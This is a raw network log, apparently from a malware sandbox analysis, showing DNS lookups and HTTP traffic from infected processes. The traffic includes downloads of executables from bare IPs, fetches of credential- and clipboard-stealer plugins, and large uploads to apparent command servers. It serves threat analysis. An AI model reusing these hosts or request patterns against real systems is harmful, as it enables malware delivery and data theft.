cookie: __Host-GAPS=1:pCToTCVJiIhTWOr2keli0XGrnLPn4g:2CEQqM0yPilU02WT
DNS

35.247.240.157.in-addr.arpa

Remote address:

8.8.8.8:53

Request

35.247.240.157.in-addr.arpa

IN PTR

Response

35.247.240.157.in-addr.arpa

IN PTR

edge-star-mini-shv-01-ams2facebookcom
DNS

141.179.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

141.179.250.142.in-addr.arpa

IN PTR

Response

141.179.250.142.in-addr.arpa

IN PTR

ams17s10-in-f131e100net
DNS

195.179.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

195.179.250.142.in-addr.arpa

IN PTR

Response

195.179.250.142.in-addr.arpa

IN PTR

ams15s42-in-f31e100net
DNS

static.xx.fbcdn.net

msedge.exe

Remote address:

8.8.8.8:53

Request

static.xx.fbcdn.net

IN A

Response

static.xx.fbcdn.net

IN CNAME

scontent.xx.fbcdn.net

scontent.xx.fbcdn.net

IN A

157.240.231.1
DNS

131.179.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

131.179.250.142.in-addr.arpa

IN PTR

Response

131.179.250.142.in-addr.arpa

IN PTR

ams17s10-in-f31e100net
DNS

158.240.127.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

158.240.127.40.in-addr.arpa

IN PTR

Response
DNS

play.google.com

msedge.exe

Remote address:

8.8.8.8:53

Request

play.google.com

IN A

Response

play.google.com

IN A

142.251.36.14
OPTIONS

https://play.google.com/log?format=json&hasfast=true&authuser=0

msedge.exe

Remote address:

142.251.36.14:443

Request

OPTIONS /log?format=json&hasfast=true&authuser=0 HTTP/2.0
host: play.google.com
accept: */*
access-control-request-method: POST
access-control-request-headers: x-goog-authuser
origin: https://accounts.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-fetch-mode: cors
sec-fetch-site: same-site
sec-fetch-dest: empty
referer: https://accounts.google.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
DNS

1.231.240.157.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.231.240.157.in-addr.arpa

IN PTR

Response

1.231.240.157.in-addr.arpa

IN PTR

xx-fbcdn-shv-01-fco2fbcdnnet
DNS

196.168.217.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

196.168.217.172.in-addr.arpa

IN PTR

Response

196.168.217.172.in-addr.arpa

IN PTR

ams16s32-in-f41e100net
DNS

14.36.251.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

14.36.251.142.in-addr.arpa

IN PTR

Response

14.36.251.142.in-addr.arpa

IN PTR

ams15s44-in-f141e100net
DNS

facebook.com

msedge.exe

Remote address:

8.8.8.8:53

Request

facebook.com

IN A

Response

facebook.com

IN A

157.240.201.35
DNS

fbcdn.net

msedge.exe

Remote address:

8.8.8.8:53

Request

fbcdn.net

IN A

Response

fbcdn.net

IN A

157.240.231.35
DNS

fbsbx.com

msedge.exe

Remote address:

8.8.8.8:53

Request

fbsbx.com

IN A

Response

fbsbx.com

IN A

157.240.231.35
DNS

35.201.240.157.in-addr.arpa

Remote address:

8.8.8.8:53

Request

35.201.240.157.in-addr.arpa

IN PTR

Response

35.201.240.157.in-addr.arpa

IN PTR

edge-star-mini-shv-01-ams4facebookcom
DNS

35.231.240.157.in-addr.arpa

Remote address:

8.8.8.8:53

Request

35.231.240.157.in-addr.arpa

IN PTR

Response

35.231.240.157.in-addr.arpa

IN PTR

edge-star-mini-shv-01-fco2facebookcom
DNS

50.23.12.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

50.23.12.20.in-addr.arpa

IN PTR

Response
DNS

56.126.166.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

56.126.166.20.in-addr.arpa

IN PTR

Response
DNS

126.178.238.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

126.178.238.8.in-addr.arpa

IN PTR

Response
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://yowxac.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 286
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 04:47:38 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://fciyelb.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 177
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 04:47:38 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://jyrgkhgti.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 121
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 04:47:39 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ywphbsyp.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 263
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 04:47:39 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://eauuhihkws.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 351
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 04:47:39 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://xiwagd.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 260
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 04:47:39 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://pvdsxrj.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 362
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 04:47:39 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://qxewdy.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 163
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 04:47:39 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://xsljkgq.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 213
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 04:47:40 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://mindyabm.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 146
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 04:47:40 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://gptimyb.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 310
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 04:47:40 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=90
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://inspgxnx.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 259
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 04:47:40 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=89
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://bhfhgubplv.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 235
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 04:47:41 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=88
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://vstxgjlono.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 299
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 04:47:41 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 40
Keep-Alive: timeout=5, max=87
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
DNS

29.68.91.77.in-addr.arpa

Remote address:

8.8.8.8:53

Request

29.68.91.77.in-addr.arpa

IN PTR

Response

29.68.91.77.in-addr.arpa

IN PTR

hosted-by yeezyhostnet
GET

http://5.42.65.80/rinkas.exe

Remote address:

5.42.65.80:80

Request

GET /rinkas.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 5.42.65.80

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 11 Oct 2023 04:47:41 GMT
Content-Type: application/octet-stream
Content-Length: 15877632
Last-Modified: Tue, 10 Oct 2023 16:08:19 GMT
Connection: keep-alive
ETag: "652576f3-f24600"
Accept-Ranges: bytes
POST

http://5.42.92.211/loghub/master

AppLaunch.exe

Remote address:

5.42.92.211:80

Request

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=HY8aAStHoRAdpsHe9gfs
Content-Length: 209
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: 5.42.92.211
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 11 Oct 2023 04:47:42 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 8
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin
DNS

80.65.42.5.in-addr.arpa

Remote address:

8.8.8.8:53

Request

80.65.42.5.in-addr.arpa

IN PTR

Response
DNS

211.92.42.5.in-addr.arpa

Remote address:

8.8.8.8:53

Request

211.92.42.5.in-addr.arpa

IN PTR

Response

211.92.42.5.in-addr.arpa

IN PTR

hosted-by yeezyhostnet
POST

http://77.91.124.1/theme/index.php

explothe.exe

Remote address:

77.91.124.1:80

Request

POST /theme/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.124.1
Content-Length: 89
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 04:47:45 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 6
Content-Type: text/html; charset=UTF-8
DNS

1.124.91.77.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.124.91.77.in-addr.arpa

IN PTR

Response

1.124.91.77.in-addr.arpa

IN PTR
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://pjdwpql.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 323
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 04:48:03 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://vqpcg.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 133
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 04:48:03 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 45
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://atogyklrqx.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 340
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 04:48:07 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://qlgbn.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 309
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 04:48:07 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://tfgesltkt.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 369
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 04:48:07 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://xvpeqwbq.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 332
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 04:48:08 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://rvvmi.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 274
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 04:48:08 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://yplcfwcufm.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 238
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 04:48:08 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://axpgweif.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 327
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 04:48:08 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
GET

http://185.216.70.222/trafico.exe

Remote address:

185.216.70.222:80

Request

GET /trafico.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 185.216.70.222

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 04:48:03 GMT
Server: Apache/2.4.29 (Ubuntu)
Last-Modified: Tue, 10 Oct 2023 13:49:38 GMT
ETag: "6b400-6075cfa598c47"
Accept-Ranges: bytes
Content-Length: 439296
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
DNS

222.70.216.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

222.70.216.185.in-addr.arpa

IN PTR

Response
DNS

240.81.21.72.in-addr.arpa

Remote address:

8.8.8.8:53

Request

240.81.21.72.in-addr.arpa

IN PTR

Response
DNS

142.9.123.176.in-addr.arpa

Remote address:

8.8.8.8:53

Request

142.9.123.176.in-addr.arpa

IN PTR

Response
DNS

142.9.123.176.in-addr.arpa

Remote address:

8.8.8.8:53

Request

142.9.123.176.in-addr.arpa

IN PTR

Response
POST

http://85.209.176.171/

Remote address:

85.209.176.171:80

Request

POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
Host: 85.209.176.171
Content-Length: 137
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Content-Length: 212
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Wed, 11 Oct 2023 04:48:22 GMT
POST

http://85.209.176.171/

Remote address:

85.209.176.171:80

Request

POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
Host: 85.209.176.171
Content-Length: 144
Expect: 100-continue
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK

Content-Length: 4744
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Wed, 11 Oct 2023 04:48:27 GMT
POST

http://85.209.176.171/

Remote address:

85.209.176.171:80

Request

POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
Host: 85.209.176.171
Content-Length: 3222541
Expect: 100-continue
Accept-Encoding: gzip, deflate
DNS

pastebin.com

Remote address:

8.8.8.8:53

Request

pastebin.com

IN A

Response

pastebin.com

IN A

172.67.34.170

pastebin.com

IN A

104.20.68.143

pastebin.com

IN A

104.20.67.143
DNS

171.176.209.85.in-addr.arpa

Remote address:

8.8.8.8:53

Request

171.176.209.85.in-addr.arpa

IN PTR

Response
DNS

170.34.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

170.34.67.172.in-addr.arpa

IN PTR

Response
DNS

api.ip.sb

Remote address:

8.8.8.8:53

Request

api.ip.sb

IN A

Response

api.ip.sb

IN CNAME

api.ip.sb.cdn.cloudflare.net

api.ip.sb.cdn.cloudflare.net

IN A

104.26.13.31

api.ip.sb.cdn.cloudflare.net

IN A

172.67.75.172

api.ip.sb.cdn.cloudflare.net

IN A

104.26.12.31
DNS

88.156.103.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

88.156.103.20.in-addr.arpa

IN PTR

Response
DNS

31.13.26.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

31.13.26.104.in-addr.arpa

IN PTR

Response
DNS

19.229.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

19.229.111.52.in-addr.arpa

IN PTR

Response
DNS

tak.soydet.top

Remote address:

8.8.8.8:53

Request

tak.soydet.top

IN A

Response

tak.soydet.top

IN A

95.217.246.182
DNS

tak.soydet.top

Remote address:

8.8.8.8:53

Request

tak.soydet.top

IN A

Response

tak.soydet.top

IN A

95.217.246.182
DNS

182.246.217.95.in-addr.arpa

Remote address:

8.8.8.8:53

Request

182.246.217.95.in-addr.arpa

IN PTR

Response

182.246.217.95.in-addr.arpa

IN PTR

static18224621795clientsyour-serverde
DNS

host-file-host6.com

Remote address:

8.8.8.8:53

Request

host-file-host6.com

IN A

Response
DNS

host-host-file8.com

Remote address:

8.8.8.8:53

Request

host-host-file8.com

IN A

Response

host-host-file8.com

IN A

194.169.175.127
DNS

host-host-file8.com

Remote address:

8.8.8.8:53

Request

host-host-file8.com

IN A

Response

host-host-file8.com

IN A

194.169.175.127
POST

http://host-host-file8.com/

Remote address:

194.169.175.127:80

Request

POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://qaomqqcxpr.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 219
Host: host-host-file8.com

Response

HTTP/1.1 200 OK

Server: nginx/1.20.2
Date: Wed, 11 Oct 2023 04:48:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
GET

http://77.91.124.1/theme/Plugins/cred64.dll

Remote address:

77.91.124.1:80

Request

GET /theme/Plugins/cred64.dll HTTP/1.1
Host: 77.91.124.1

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 04:48:35 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 273
Content-Type: text/html; charset=iso-8859-1
GET

http://77.91.124.1/theme/Plugins/clip64.dll

Remote address:

77.91.124.1:80

Request

GET /theme/Plugins/clip64.dll HTTP/1.1
Host: 77.91.124.1

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 04:48:35 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sat, 30 Sep 2023 10:50:50 GMT
ETag: "16400-60691507c5cc0"
Accept-Ranges: bytes
Content-Length: 91136
Content-Type: application/x-msdos-program
DNS

127.175.169.194.in-addr.arpa

Remote address:

8.8.8.8:53

Request

127.175.169.194.in-addr.arpa

IN PTR

Response
DNS

bytecloudasa.website

Remote address:

8.8.8.8:53

Request

bytecloudasa.website

IN A

Response

bytecloudasa.website

IN A

104.21.61.162

bytecloudasa.website

IN A

172.67.212.39
POST

http://bytecloudasa.website/api

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 8
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 04:48:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=x6gqTiLbq2MCXogB%2BNmpbMZFAD0obL4ZFViD%2F%2FAuHHvTZRdnH7rupzjcvWoPIRppOPiWcrlnNwU2Vs4sQX%2Fm%2F%2Bl9biW5jL%2BYfQcNGCwwFkncj%2FeASF8liY340dt7Mf3TnTMbCGvUpg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 814478d7ba43b956-AMS
POST

http://bytecloudasa.website/api

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=vtyM_Ynwc7Av6OrtbRHDwnYe4DgTaNREpBm4VlQLwYw-1696999719-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 04:48:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=7ps4i5gd49mq76j845k1ifpfgk; expires=Sat, 03 Feb 2024 22:35:19 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 04:48:40 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dVJ0BN3tQBOLLotqkEcRcwQI%2Ffn1SXFqAvsJSDptVWfnwsjvS%2FS4vBAGje6LX2vLMjicCFelzwadDP5uudO5a3rCcArhwHUOBRoVDPimujru4CPf5CP0sr%2FRvO4sH4InBCawncpqrQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
